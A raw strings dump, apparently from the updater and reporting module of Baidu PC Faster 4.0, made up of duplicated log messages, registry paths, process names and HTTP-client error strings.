::GetFileSize failed ("%s").
::GetFileSize failed ("%s").
::WriteFile failed ("%s").
::WriteFile failed ("%s").
HTTP://
HTTP://
HTTPS://
HTTPS://
application/x-www-form-urlencoded
application/x-www-form-urlencoded
CHttpToolW::SendRequestEx: hRequest can not be NULL.
CHttpToolW::SendRequestEx: hRequest can not be NULL.
CHttpEncoderW::AnsiEncodeLen: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpEncoderW::AnsiEncodeLen: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpEncoderW::AnsiEncode: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpEncoderW::AnsiEncode: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpEncoderW::AnsiEncode: szBuff can not be NULL.
CHttpEncoderW::AnsiEncode: szBuff can not be NULL.
CHttpEncoderW::AnsiDecodeLen: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpEncoderW::AnsiDecodeLen: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpEncoderW::AnsiDecode: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpEncoderW::AnsiDecode: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpEncoderW::AnsiDecode: szBuff can not be NULL.
CHttpEncoderW::AnsiDecode: szBuff can not be NULL.
CHttpEncoderW::Utf8Encode: szBuff can not be NULL.
CHttpEncoderW::Utf8Encode: szBuff can not be NULL.
CHttpEncoderW::Utf8Decode: szBuff can not be NULL.
CHttpEncoderW::Utf8Decode: szBuff can not be NULL.
CHttpEncoderW::UrlEncodeA: szBuff can not be NULL.
CHttpEncoderW::UrlEncodeA: szBuff can not be NULL.
CHttpEncoderW::UrlEncodeW: szBuff can not be NULL.
CHttpEncoderW::UrlEncodeW: szBuff can not be NULL.
CHttpEncoderW::_Utf8CharToAnsiChar: szAnsiChar and szUtf8Char can not be NULL.
CHttpEncoderW::_Utf8CharToAnsiChar: szAnsiChar and szUtf8Char can not be NULL.
CHttpEncoderW::UrlDecodeA: szBuff can not be NULL.
CHttpEncoderW::UrlDecodeA: szBuff can not be NULL.
CHttpEncoderW::UrlDecodeW: szBuff can not be NULL.
CHttpEncoderW::UrlDecodeW: szBuff can not be NULL.
CHttpClientMapT::Remove: szName can not be NULL.
CHttpClientMapT::Remove: szName can not be NULL.
CHttpClientMapT::RemoveAll: szName can not be NULL.
CHttpClientMapT::RemoveAll: szName can not be NULL.
CHttpClientMapT::Exists: szName can not be NULL.
CHttpClientMapT::Exists: szName can not be NULL.
CHttpClientMapT::Get: szName can not be NULL.
CHttpClientMapT::Get: szName can not be NULL.
CHttpClientMapT::AddPointerDirectly: szName can not be NULL.
CHttpClientMapT::AddPointerDirectly: szName can not be NULL.
CHttpClientMapT::Add: szName can not be NULL.
CHttpClientMapT::Add: szName can not be NULL.
CHttpClientMapT::Set: szName can not be NULL.
CHttpClientMapT::Set: szName can not be NULL.
CHttpResponseT::GetHeaderCount: szName can not be NULL.
CHttpResponseT::GetHeaderCount: szName can not be NULL.
CHttpResponseT::GetHeader: szName can not be NULL.
CHttpResponseT::GetHeader: szName can not be NULL.
CHttpResponseT::GetStatus: m_hRequest can not be NULL.
CHttpResponseT::GetStatus: m_hRequest can not be NULL.
CHttpResponseT::GetStatusText: m_hRequest can not be NULL.
CHttpResponseT::GetStatusText: m_hRequest can not be NULL.
CHttpResponseT::GetContentLength: m_hRequest can not be NULL.
CHttpResponseT::GetContentLength: m_hRequest can not be NULL.
CHttpResponseT::ReadContent: m_hRequest can not be NULL.
CHttpResponseT::ReadContent: m_hRequest can not be NULL.
CHttpResponseT::ReadContent: pbyBuff can not be NULL.
CHttpResponseT::ReadContent: pbyBuff can not be NULL.
CHttpResponseT::ReadContent: cbBuff can not be zero.
CHttpResponseT::ReadContent: cbBuff can not be zero.
CHttpResponseT::SaveContent: szFilePath can not be NULL.
CHttpResponseT::SaveContent: szFilePath can not be NULL.
CHttpResponseT::_LoadHeader: m_hRequest can not be NULL.
CHttpResponseT::_LoadHeader: m_hRequest can not be NULL.
CHttpResponseT::_LoadHeader: szName can not be NULL.
CHttpResponseT::_LoadHeader: szName can not be NULL.
CHttpPostStatT::ActualTotalByte: The post context is not active.
CHttpPostStatT::ActualTotalByte: The post context is not active.
CHttpPostStatT::ActualPostedByte: The post context is not active.
CHttpPostStatT::ActualPostedByte: The post context is not active.
CHttpPostStatT::TotalByte: The post context is not active.
CHttpPostStatT::TotalByte: The post context is not active.
CHttpPostStatT::PostedByte: The post context is not active.
CHttpPostStatT::PostedByte: The post context is not active.
CHttpPostStatT::TotalCount: The post context is not active.
CHttpPostStatT::TotalCount: The post context is not active.
CHttpPostStatT::PostedCount: The post context is not active.
CHttpPostStatT::PostedCount: The post context is not active.
CHttpPostStatT::FileCount: The post context is not active.
CHttpPostStatT::FileCount: The post context is not active.
CHttpPostStatT::PostedFileCount: The post context is not active.
CHttpPostStatT::PostedFileCount: The post context is not active.
CHttpPostStatT::CurrParam: The post context is not active.
CHttpPostStatT::CurrParam: The post context is not active.
CHttpPostStatT::CurrFile: The post context is not active.
CHttpPostStatT::CurrFile: The post context is not active.
CHttpPostStatT::CurrParamTotalByte: The post context is not active.
CHttpPostStatT::CurrParamTotalByte: The post context is not active.
CHttpPostStatT::CurrParamPostedByte: The post context is not active.
CHttpPostStatT::CurrParamPostedByte: The post context is not active.
CHttpPostStatT::CurrParamRemainByte: The post context is not active.
CHttpPostStatT::CurrParamRemainByte: The post context is not active.
CHttpPostStatT::CurrParamIsFile: The post context is not active.
CHttpPostStatT::CurrParamIsFile: The post context is not active.
CHttpPostStatT::CurrParamIsComplete: The post context is not active.
CHttpPostStatT::CurrParamIsComplete: The post context is not active.
CHttpPostStatT::_TestAddActualPostedBytes: The post context is not active.
CHttpPostStatT::_TestAddActualPostedBytes: The post context is not active.
CHttpPostStatT::_TestStartNewEntry: The post context is not active.
CHttpPostStatT::_TestStartNewEntry: The post context is not active.
CHttpPostStatT::_TestAddPostedBytes: The post context is not active.
CHttpPostStatT::_TestAddPostedBytes: The post context is not active.
CHttpUrlAnalyzerT::Analyze: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpUrlAnalyzerT::Analyze: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpClientT::SetUseUtf8: It is not allowed to call this method if the POST context is active.
CHttpClientT::SetUseUtf8: It is not allowed to call this method if the POST context is active.
CHttpClientT::SetAnsiCodePage: It is not allowed to call this method if the POST context is active.
CHttpClientT::SetAnsiCodePage: It is not allowed to call this method if the POST context is active.
CHttpClientT::SetAnsiCodePage: CP_UTF8 and CP_UTF7 can not be used for the nAnsiCodePage parameter.
CHttpClientT::SetAnsiCodePage: CP_UTF8 and CP_UTF7 can not be used for the nAnsiCodePage parameter.
CHttpClientT::AddHeader: szName can not be NULL.
CHttpClientT::AddHeader: szName can not be NULL.
CHttpClientT::AddHeader: szName can not be an empty string.
CHttpClientT::AddHeader: szName can not be an empty string.
CHttpClientT::AddHeader: szValue can not be NULL.
CHttpClientT::AddHeader: szValue can not be NULL.
CHttpClientT::AddHeader: szValue can not be an empty string.
CHttpClientT::AddHeader: szValue can not be an empty string.
CHttpClientT::SetHeader: szName can not be NULL.
CHttpClientT::SetHeader: szName can not be NULL.
CHttpClientT::SetHeader: szName can not be an empty string.
CHttpClientT::SetHeader: szName can not be an empty string.
CHttpClientT::SetHeader: szValue can not be NULL.
CHttpClientT::SetHeader: szValue can not be NULL.
CHttpClientT::SetHeader: szValue can not be an empty string.
CHttpClientT::SetHeader: szValue can not be an empty string.
CHttpClientT::ClearParam: It is not allowed to call this method if the POST context is active.
CHttpClientT::ClearParam: It is not allowed to call this method if the POST context is active.
CHttpClientT::RemoveParam: It is not allowed to call this method if the POST context is active.
CHttpClientT::RemoveParam: It is not allowed to call this method if the POST context is active.
CHttpClientT::RemoveAllParam: It is not allowed to call this method if the POST context is active.
CHttpClientT::RemoveAllParam: It is not allowed to call this method if the POST context is active.
CHttpClientT::AddParam: It is not allowed to call this method if the POST context is active.
CHttpClientT::AddParam: It is not allowed to call this method if the POST context is active.
CHttpClientT::SetParam: It is not allowed to call this method if the POST context is active.
CHttpClientT::SetParam: It is not allowed to call this method if the POST context is active.
CHttpClientT::MakeGetUrl: szBuff can not be NULL.
CHttpClientT::MakeGetUrl: szBuff can not be NULL.
CHttpClientT::OpenConnection: hInternet can not be NULL.
CHttpClientT::OpenConnection: hInternet can not be NULL.
CHttpClientT::SetProxyAccount: szUserName can not be NULL.
CHttpClientT::SetProxyAccount: szUserName can not be NULL.
CHttpClientT::SetProxyAccount: szUserName can not be an empty string.
CHttpClientT::SetProxyAccount: szUserName can not be an empty string.
CHttpClientT::SetProxyAccount: szPassword can not be NULL.
CHttpClientT::SetProxyAccount: szPassword can not be NULL.
CHttpClientT::SetProxyAccount: szPassword can not be an empty string.
CHttpClientT::SetProxyAccount: szPassword can not be an empty string.
CHttpClientT::ApplyProxyAccount: hConnection can not be NULL.
CHttpClientT::ApplyProxyAccount: hConnection can not be NULL.
CHttpClientT::OpenRequest: hConnection can not be NULL.
CHttpClientT::OpenRequest: hConnection can not be NULL.
CHttpClientT::AddRequestHeader: hRequest can not be NULL.
CHttpClientT::AddRequestHeader: hRequest can not be NULL.
CHttpClientT::_WritePost: m_hRequest can not be NULL.
CHttpClientT::_WritePost: m_hRequest can not be NULL.
CHttpClientT::_ProceedPostContext: m_hInternet can not be NULL.
CHttpClientT::_ProceedPostContext: m_hInternet can not be NULL.
CHttpClientT::_ProceedPostContext: m_hConnection can not be NULL.
CHttpClientT::_ProceedPostContext: m_hConnection can not be NULL.
CHttpClientT::_ProceedPostContext: m_hRequest can not be NULL.
CHttpClientT::_ProceedPostContext: m_hRequest can not be NULL.
CHttpClientT::_ProceedPostContext: nDesired can not be zero.
CHttpClientT::_ProceedPostContext: nDesired can not be zero.
CHttpClientT::_ProceedUploadContext: m_hInternet can not be NULL.
CHttpClientT::_ProceedUploadContext: m_hInternet can not be NULL.
CHttpClientT::_ProceedUploadContext: m_hConnection can not be NULL.
CHttpClientT::_ProceedUploadContext: m_hConnection can not be NULL.
CHttpClientT::_ProceedUploadContext: m_hRequest can not be NULL.
CHttpClientT::_ProceedUploadContext: m_hRequest can not be NULL.
CHttpClientT::_ProceedUploadContext: nDesired can not be zero.
CHttpClientT::_ProceedUploadContext: nDesired can not be zero.
CHttpClientT::_ReleasePostResponse: The post context is not active.
CHttpClientT::_ReleasePostResponse: The post context is not active.
_UrlEncodeLen: szStr can not be NULL.
_UrlEncodeLen: szStr can not be NULL.
UploadByItSelf, %s is not exist
UploadByItSelf, %s is not exist
UploadByItSelf, nTime = %d
UploadByItSelf, nTime = %d
eGlobal\Baidu_IS_Update_Dynamic_Mutex_{PCFaster_4.0.0.0}
eGlobal\Baidu_IS_Update_Dynamic_Mutex_{PCFaster_4.0.0.0}
Global\FileTransferEx_Mutex_{616EFCAC-8B9B-44ba-B764-229F25EB5405}
Global\FileTransferEx_Mutex_{616EFCAC-8B9B-44ba-B764-229F25EB5405}
liveupdate.exe
liveupdate.exe
data_report_user_op_prefix%d[:]1
data_report_user_op_prefix%d[:]1
data_report_user_op_prefix%d[:]%d
data_report_user_op_prefix%d[:]%d
data_report_user_op_prefix%d[:]%s
data_report_user_op_prefix%d[:]%s
d-d-d d:d:d
d-d-d d:d:d
Unknown error X
Unknown error X
BugReporter.exe
BugReporter.exe
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
CMyRegKeyBase::Open, m_mapRegKey.find(%s)
CMyRegKeyBase::Open, m_mapRegKey.find(%s)
nCMyRegKeyBase::EqualType, m_mapRegType.find(%s)
nCMyRegKeyBase::EqualType, m_mapRegType.find(%s)
2014-01-01Td:d:00
2014-01-01Td:d:00
2026-01-01Td:d:00
2026-01-01Td:d:00
Create Vista Task Return Code:%d
Create Vista Task Return Code:%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu Antivirus
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu Antivirus
iSafeTray.exe
iSafeTray.exe
isafeSvc.exe
isafeSvc.exe
iSafeSvc2.exe
iSafeSvc2.exe
psprotege.exe
psprotege.exe
psprotegesvc.exe
psprotegesvc.exe
PSafeSuite.exe
PSafeSuite.exe
PsSuiteSVC.exe
PsSuiteSVC.exe
SOFTWARE\Clients\StartMenuInternet\PSafe WEB
SOFTWARE\Clients\StartMenuInternet\PSafe WEB
psafeweb.exe
psafeweb.exe
BavSvc.exe
BavSvc.exe
BHipsSvc.exe
BHipsSvc.exe
UU_MSG_URL
UU_MSG_URL
gSendUserMsg, szPath=%s, bInService=%u, bDefault=%u, strUrl=%s
gSendUserMsg, szPath=%s, bInService=%u, bDefault=%u, strUrl=%s
gSendUserMsg, COMM_FUNC::GetUserKey(HKEY_CURRENT_USER)=NULL
gSendUserMsg, COMM_FUNC::GetUserKey(HKEY_CURRENT_USER)=NULL
SOFTWARE\Baidu Security\PC Faster\4.0.0.0\Install
SOFTWARE\Baidu Security\PC Faster\4.0.0.0\Install
LastUUReportOKDay
LastUUReportOKDay
SOFTWARE\Baidu Security\PC Faster\4.0.0.0\UUReport
SOFTWARE\Baidu Security\PC Faster\4.0.0.0\UUReport
%s=%s
%s=%s
SendUserMsg, QueryDWORDValue(%s), dwCurDay == dwLastDay
SendUserMsg, QueryDWORDValue(%s), dwCurDay == dwLastDay
SendUserMsg, listParam.push_back, ISafe=%d
SendUserMsg, listParam.push_back, ISafe=%d
SendUserMsg, listParam.push_back, PSafe=%d
SendUserMsg, listParam.push_back, PSafe=%d
SendUserMsg, listParam.push_back, PSuite=%d
SendUserMsg, listParam.push_back, PSuite=%d
SendUserMsg, listParam.push_back, PSafeWeb=%d
SendUserMsg, listParam.push_back, PSafeWeb=%d
SendUserMsg, listParam.push_back, BavInstalled=%d
SendUserMsg, listParam.push_back, BavInstalled=%d
[d-d-d d:d:d]
[d-d-d d:d:d]
SendUserMsg, RegKey.SetDWORDValue(%s, %u)=0
SendUserMsg, RegKey.SetDWORDValue(%s, %u)=0
SendUserMsg, pBuf2=%u
SendUserMsg, pBuf2=%u
SendUserMsg, CCommunication::SendData(%s, %u)=%u
SendUserMsg, CCommunication::SendData(%s, %u)=%u
SendUserMsg, pBuf=%u
SendUserMsg, pBuf=%u
SendUserMsg, bSuccess=%u
SendUserMsg, bSuccess=%u
STATISTIC_MSG_URL
STATISTIC_MSG_URL
Global\Baidu_IS_LogReporter_Mutex_{PCFaster_4.0.0.0}
Global\Baidu_IS_LogReporter_Mutex_{PCFaster_4.0.0.0}
%d-%d-%d %d:%d:%d
%d-%d-%d %d:%d:%d
CUpdateAgent::CheckNeedUpdate_: Call m_piUpdate->CheckNeedUpdate failed(x).
CUpdateAgent::CheckNeedUpdate_: Call m_piUpdate->CheckNeedUpdate failed(x).
CUpdateAgent::CheckNeedUpdate_: Call QueryStatus failed(x).
CUpdateAgent::CheckNeedUpdate_: Call QueryStatus failed(x).
CUpdateAgent::DownloadUpdateFiles_: Call m_piUpdate->DownloadUpdateFiles failed(x).
CUpdateAgent::DownloadUpdateFiles_: Call m_piUpdate->DownloadUpdateFiles failed(x).
CUpdateAgent::DownloadUpdateFiles_: Call QueryStatus failed(x).
CUpdateAgent::DownloadUpdateFiles_: Call QueryStatus failed(x).
CUpdateAgent::UpdateFiles_: Call m_piUpdate->UpdateFiles failed(x).
CUpdateAgent::UpdateFiles_: Call m_piUpdate->UpdateFiles failed(x).
CUpdateAgent::UpdateFiles_: Call QueryStatus failed(x).
CUpdateAgent::UpdateFiles_: Call QueryStatus failed(x).
CUpdateAgent::AgentInit_: Call LoadLibary failed(x).
CUpdateAgent::AgentInit_: Call LoadLibary failed(x).
CUpdateAgent::AgentInit_: Call GetProcAddress failed(x).
CUpdateAgent::AgentInit_: Call GetProcAddress failed(x).
tCUpdateAgent::AgentInit_: Call DllGetClassObject failed(x).
tCUpdateAgent::AgentInit_: Call DllGetClassObject failed(x).
-send_uu_msg
-send_uu_msg
%d: %s
%d: %s
Baidu_IS_SETUP_SHAKEHAND_{PCFaster_4.0.0.0}
Baidu_IS_SETUP_SHAKEHAND_{PCFaster_4.0.0.0}
Global\Baidu_IS_Update_Mutex_{PCFaster_4.0.0.0}
Global\Baidu_IS_Update_Mutex_{PCFaster_4.0.0.0}
ManualUpdate.ini
ManualUpdate.ini
File (%s) not exists.
File (%s) not exists.
Failed to open filemapping (%s)
Failed to open filemapping (%s)
PC_Faster_Setup.exe
PC_Faster_Setup.exe
Found a match package, we do not need to download (%s).
Found a match package, we do not need to download (%s).
PC_Faster_Setup_Temp.exe
PC_Faster_Setup_Temp.exe
Start to download file (%s) from url (%s).
Start to download file (%s) from url (%s).
Success to download file (%s).
Success to download file (%s).
Success to download file (%s), but the MD5 is invalid.
Success to download file (%s), but the MD5 is invalid.
Failed to download file (%s) from url (%s).
Failed to download file (%s) from url (%s).
NewFeatures.txt
NewFeatures.txt
ui thread id: %u
ui thread id: %u
bShowWindow: %u, bShowTrayIcon: %u
bShowWindow: %u, bShowTrayIcon: %u
UPDATE_STATUS_STOP, update man status: %d, full_install_package_exit_code: %d
UPDATE_STATUS_STOP, update man status: %d, full_install_package_exit_code: %d
GetManualUpdateInfo : communication.Init() failed!
GetManualUpdateInfo : communication.Init() failed!
oGetManualUpdateInfo : %s size == 0
oGetManualUpdateInfo : %s size == 0
4.0.1.56222
4.0.1.56222
web|gl|official|direct
web|gl|official|direct
_{PCFaster_4.0.0.0}
_{PCFaster_4.0.0.0}
\update.dll
\update.dll
update.dll
update.dll
CUpdateMan::DoWork: Call clUpdate.AgentInit failed(x).
CUpdateMan::DoWork: Call clUpdate.AgentInit failed(x).
CUpdateMan::DoWork: Call clUpdate.Init failed(x).
CUpdateMan::DoWork: Call clUpdate.Init failed(x).
CUpdateMan::DoWork: Call clUpdate.CheckNeedUpdate failed(x).
CUpdateMan::DoWork: Call clUpdate.CheckNeedUpdate failed(x).
NewUpdate.ini
NewUpdate.ini
CUpdateMan::DoWork: There client Skip update(nAutoUpdate=%d).
CUpdateMan::DoWork: There client Skip update(nAutoUpdate=%d).
CUpdateMan::DoWork: Call clUpdate.DownloadUpdateFiles failed(x).
CUpdateMan::DoWork: Call clUpdate.DownloadUpdateFiles failed(x).
CUpdateMan::DoWork: Backup file , copy (%s) to (%s) failed (0x%x).
CUpdateMan::DoWork: Backup file , copy (%s) to (%s) failed (0x%x).
/S /Update "/FromVersion=%s"
/S /Update "/FromVersion=%s"
/S "/NewFeatures=%s"
/S "/NewFeatures=%s"
NewUpdater.exe
NewUpdater.exe
CUpdateMan::DoWork: Failed to launch NewUpdater.exe, dwExitCode = %u, (0x%x)
CUpdateMan::DoWork: Failed to launch NewUpdater.exe, dwExitCode = %u, (0x%x)
"%s" /AutoUpdate
"%s" /AutoUpdate
CUpdateMan::DoWork: Failed to copy new features and install package to appdata.(%u)
CUpdateMan::DoWork: Failed to copy new features and install package to appdata.(%u)
CUpdateMan::DoWork: Failed to move install package to appdata.(%u)
CUpdateMan::DoWork: Failed to move install package to appdata.(%u)
\DataFileVer.xml
\DataFileVer.xml
\InstallUtility.dll
\InstallUtility.dll
InstallUtility.dll,
InstallUtility.dll,
Failed to post WM_NOTIFY_UPDATE_REBOOT to MainWnd: error=%d
Failed to post WM_NOTIFY_UPDATE_REBOOT to MainWnd: error=%d
Failed to post WM_NOTIFY_UPDATE_REBOOT to TrayWnd: error=%d
Failed to post WM_NOTIFY_UPDATE_REBOOT to TrayWnd: error=%d
CUpdateMan::DoWork: Call get_update_file_lists failed(%d).
CUpdateMan::DoWork: Call get_update_file_lists failed(%d).
CUpdateMan::DoWork: Call is_proc_running failed(%d).
CUpdateMan::DoWork: Call is_proc_running failed(%d).
Failed to post WM_NOTIFY_UPDATE_WAIT to TrayWnd: error=%d
Failed to post WM_NOTIFY_UPDATE_WAIT to TrayWnd: error=%d
CUpdateMan::DoWork: Call is_can_dynamic_update failed(%d).
CUpdateMan::DoWork: Call is_can_dynamic_update failed(%d).
BavMustWaitExeFileList
BavMustWaitExeFileList
CUpdateMan::DoWork: Call clUpdate.UpdateFiles(enumUpdateFilesFunction) failed(x).
CUpdateMan::DoWork: Call clUpdate.UpdateFiles(enumUpdateFilesFunction) failed(x).
install_channel=%s&from_version=%s&to_version=%s&userid=%s
install_channel=%s&from_version=%s&to_version=%s&userid=%s
UPDATE_CHANNEL_URL
UPDATE_CHANNEL_URL
CUpdateMan::DoWork: End(%d).
CUpdateMan::DoWork: End(%d).
CUpdateMan::kill_proc_: Call TerminateProcess(%s) failed(0x%x).
CUpdateMan::kill_proc_: Call TerminateProcess(%s) failed(0x%x).
get_process_file_path_by_pid: call OpenProcess failed(%x)
get_process_file_path_by_pid: call OpenProcess failed(%x)
get_process_file_path_by_pid: call EnumProcessModules failed(%x)
get_process_file_path_by_pid: call EnumProcessModules failed(%x)
get_process_file_path_by_pid: call GetModuleFileNameEx failed(%x)
get_process_file_path_by_pid: call GetModuleFileNameEx failed(%x)
Global\{D2832A89-8FD2-8e20-A872-578A727C7536}
Global\{D2832A89-8FD2-8e20-A872-578A727C7536}
Failed to post WM_NOTIFY_UPDATE_WAIT to MainWnd: error=%d
Failed to post WM_NOTIFY_UPDATE_WAIT to MainWnd: error=%d
CUpdateMan::is_can_dynamic_update_: Call is_pcf_busy failed(0x%x)
CUpdateMan::is_can_dynamic_update_: Call is_pcf_busy failed(0x%x)
PCFasterFeedback.exe
PCFasterFeedback.exe
NSISInstall.exe
NSISInstall.exe
FasterNow.exe
FasterNow.exe
CUpdateMan::is_pcf_busy_: The %s process is running.
CUpdateMan::is_pcf_busy_: The %s process is running.
CUpdateMan::is_pcf_busy_: The %s process is working.
CUpdateMan::is_pcf_busy_: The %s process is working.
CUpdateMan::get_update_file_lists_: Call clUpdate.GetUpdateFilesList failed(0x%x)
CUpdateMan::get_update_file_lists_: Call clUpdate.GetUpdateFilesList failed(0x%x)
CUpdateMan::get_update_file_lists_: Call clUpdate.GetUpdateInfo failed(0x%x)
CUpdateMan::get_update_file_lists_: Call clUpdate.GetUpdateInfo failed(0x%x)
CUpdateMan::get_update_file_lists_: Call create_file_list_set failed(0x%x)
CUpdateMan::get_update_file_lists_: Call create_file_list_set failed(0x%x)
CUpdateMan::kill_proc_and_stop_svc_: Call quit_bav_tray failed(%d).
CUpdateMan::kill_proc_and_stop_svc_: Call quit_bav_tray failed(%d).
Global\{D1832A89-8FD1-8e20-A871-578A717C7536}
Global\{D1832A89-8FD1-8e20-A871-578A717C7536}
CUpdateMan::wait_exe_quit_: The process(%s) is not runing.
CUpdateMan::wait_exe_quit_: The process(%s) is not runing.
tCUpdateMan::wait_must_wait_exe_quit_: Call wait_exe_quit(%s, 60) return FALSE.
tCUpdateMan::wait_must_wait_exe_quit_: Call wait_exe_quit(%s, 60) return FALSE.
Failed to post WM_NOTIFY_TRAY_EXIT to TrayWnd: error=%d
Failed to post WM_NOTIFY_TRAY_EXIT to TrayWnd: error=%d
CUpdateMan::quit_bav_tray_: Call kill_proc(%s) failed(0x%x).
CUpdateMan::quit_bav_tray_: Call kill_proc(%s) failed(0x%x).
CUpdateMan::quit_bav_tray_: Call kill_proc(%s) successful.
CUpdateMan::quit_bav_tray_: Call kill_proc(%s) successful.
CUpdateMan::kill_bav_exes_: Call TerminateProcess(%s) failed(0x%x).
CUpdateMan::kill_bav_exes_: Call TerminateProcess(%s) failed(0x%x).
CUpdateMan::start_svcs_: Begin(%s).
CUpdateMan::start_svcs_: Begin(%s).
sc.exe
sc.exe
start %s
start %s
CUpdateMan::start_svcs_: Call CommonUtil::StartService, bRetCode=0x%x, lastErr=0x%x.
CUpdateMan::start_svcs_: Call CommonUtil::StartService, bRetCode=0x%x, lastErr=0x%x.
CUpdateMan::start_svcs_: Call sc start, lastErr=0x%x.
CUpdateMan::start_svcs_: Call sc start, lastErr=0x%x.
CUpdateMan::start_svcs_: End(0x%x).
CUpdateMan::start_svcs_: End(0x%x).
CUpdateMan::start_bav_exe_as_active_user_: Begin(%s).
CUpdateMan::start_bav_exe_as_active_user_: Begin(%s).
CUpdateMan::start_bav_exe_as_active_user_: The process is runing.
CUpdateMan::start_bav_exe_as_active_user_: The process is runing.
CUpdateMan::start_bav_exe_as_active_user_: Call SessionMan.StartAppForActiveUser return: %d.
CUpdateMan::start_bav_exe_as_active_user_: Call SessionMan.StartAppForActiveUser return: %d.
CUpdateMan::start_bav_exe_as_active_user_: Call CHelper::RunExe return: %d.
CUpdateMan::start_bav_exe_as_active_user_: Call CHelper::RunExe return: %d.
CUpdateMan::start_bav_exe_as_active_user_: End(0x%x).
CUpdateMan::start_bav_exe_as_active_user_: End(0x%x).
stop %s
stop %s
BHips.dll
BHips.dll
StopProtectDrv, BHips_SetProtectOpt(selfdefense, 0)=%u
StopProtectDrv, BHips_SetProtectOpt(selfdefense, 0)=%u
CUpdateMan::my_shell_execute_: Call ShellExecuteEx(%s, %s) failed(0x%x), ExecInfo.hProcess=%d
CUpdateMan::my_shell_execute_: Call ShellExecuteEx(%s, %s) failed(0x%x), ExecInfo.hProcess=%d
CUpdateMan::my_shell_execute_: Call GetExitCodeProcess failed(0x%x), dwExitCode = 0x%x
CUpdateMan::my_shell_execute_: Call GetExitCodeProcess failed(0x%x), dwExitCode = 0x%x
CUpdateMan::InitUpdPost: Call LoadLibary failed(x).
CUpdateMan::InitUpdPost: Call LoadLibary failed(x).
CUpdateMan::InitUpdPost: Call GetProcAddress failed(x).
CUpdateMan::InitUpdPost: Call GetProcAddress failed(x).
%s%s%s
%s%s%s
Correct password required
Correct password required
\Updater-ddd.log
\Updater-ddd.log
LookupPrivilegeValue error: %u
LookupPrivilegeValue error: %u
AdjustTokenPrivileges error: %u
AdjustTokenPrivileges error: %u
user name: %s, domain: %s
user name: %s, domain: %s
rWTSEnumerateSessions failed, error code:%u
rWTSEnumerateSessions failed, error code:%u
kWTSEnumerateSessions OK, %u sessions
kWTSEnumerateSessions OK, %u sessions
n%dth session: %s, id:%d, state:%d
n%dth session: %s, id:%d, state:%d
kOnSessionLogon, session id: %d
kOnSessionLogon, session id: %d
OnSessionLogoff, session id: %d
OnSessionLogoff, session id: %d
OnSessionConnect, session id: %d
OnSessionConnect, session id: %d
StartAppForUser: %s, thread id: %u
StartAppForUser: %s, thread id: %u
CreateEnvironmentBlock failed, error code: %u, thread id: %u
CreateEnvironmentBlock failed, error code: %u, thread id: %u
CreateProcessAsUser for %s is OK., thread id: %u
CreateProcessAsUser for %s is OK., thread id: %u
CreateProcessAsUser failed, error code: %u, thread id: %u
CreateProcessAsUser failed, error code: %u, thread id: %u
Enter StartAppForActiveUser, thread id: %u
Enter StartAppForActiveUser, thread id: %u
Before WTSQueryUserToken, thread id: %u
Before WTSQueryUserToken, thread id: %u
QueryUserToken failed, error code: %u, thread id: %u
QueryUserToken failed, error code: %u, thread id: %u
GetTokenInformation failed, error code: %u, thread id: %u
GetTokenInformation failed, error code: %u, thread id: %u
StartAppForActiveUser: %s, thread id: %u
StartAppForActiveUser: %s, thread id: %u
LogReporter.exe
LogReporter.exe
"%s" -show_ui -launch_uac_app %s
"%s" -show_ui -launch_uac_app %s
"%s" -launch_uac_app %s
"%s" -launch_uac_app %s
Leave StartAppForActiveUser, thread id: %u
Leave StartAppForActiveUser, thread id: %u
"%s" found, session id: %u, process id: %u
"%s" found, session id: %u, process id: %u
2CreateEnvironmentBlock Failed: %u
2CreateEnvironmentBlock Failed: %u
CreateProcessAsUser Failed, error code: %u
CreateProcessAsUser Failed, error code: %u
WTSEnumerateSessions OK, %u sessions
WTSEnumerateSessions OK, %u sessions
%dth session: %s, id:%d, state:%d
%dth session: %s, id:%d, state:%d
OnShutdown, thread id: %u
OnShutdown, thread id: %u
nOnInit, thread id: %u
nOnInit, thread id: %u
texplorer.exe
texplorer.exe
WTSEnumerateSessions failed, error code: %u
WTSEnumerateSessions failed, error code: %u
winlogon.exe
winlogon.exe
nProcess token open Error: %u
nProcess token open Error: %u
nDuplicateTokenEx Error: %u
nDuplicateTokenEx Error: %u
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0
partern id: %s, cgi: %s, version url: %s, user desc: %s
partern id: %s, cgi: %s, version url: %s, user desc: %s
type=%s|||id=%s|||partnerID=%s
type=%s|||id=%s|||partnerID=%s
l\Baidu Security\PC Faster\4.0.0.0
l\Baidu Security\PC Faster\4.0.0.0
Error %u in WinHttpCrackUrl, url: "%s"
Error %u in WinHttpCrackUrl, url: "%s"
http reply data: "%s"
http reply data: "%s"
apost msg "%s" to url "%s"
apost msg "%s" to url "%s"
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
AddDownloadTask, url: "%s"
AddDownloadTask, url: "%s"
http thread id: %u
http thread id: %u
km_hSession is %u
km_hSession is %u
Error code %d, desr: %s
Error code %d, desr: %s
http status: %d
http status: %d
failed to create file "%s", error code: %d
failed to create file "%s", error code: %d
failed to get size for file "%s", error code: %d
failed to get size for file "%s", error code: %d
protocol: %s, host: %s, port: %d, uri: %s
protocol: %s, host: %s, port: %d, uri: %s
download file failed: filename=%s, url=%s
download file failed: filename=%s, url=%s
https
https
add %s to http request header
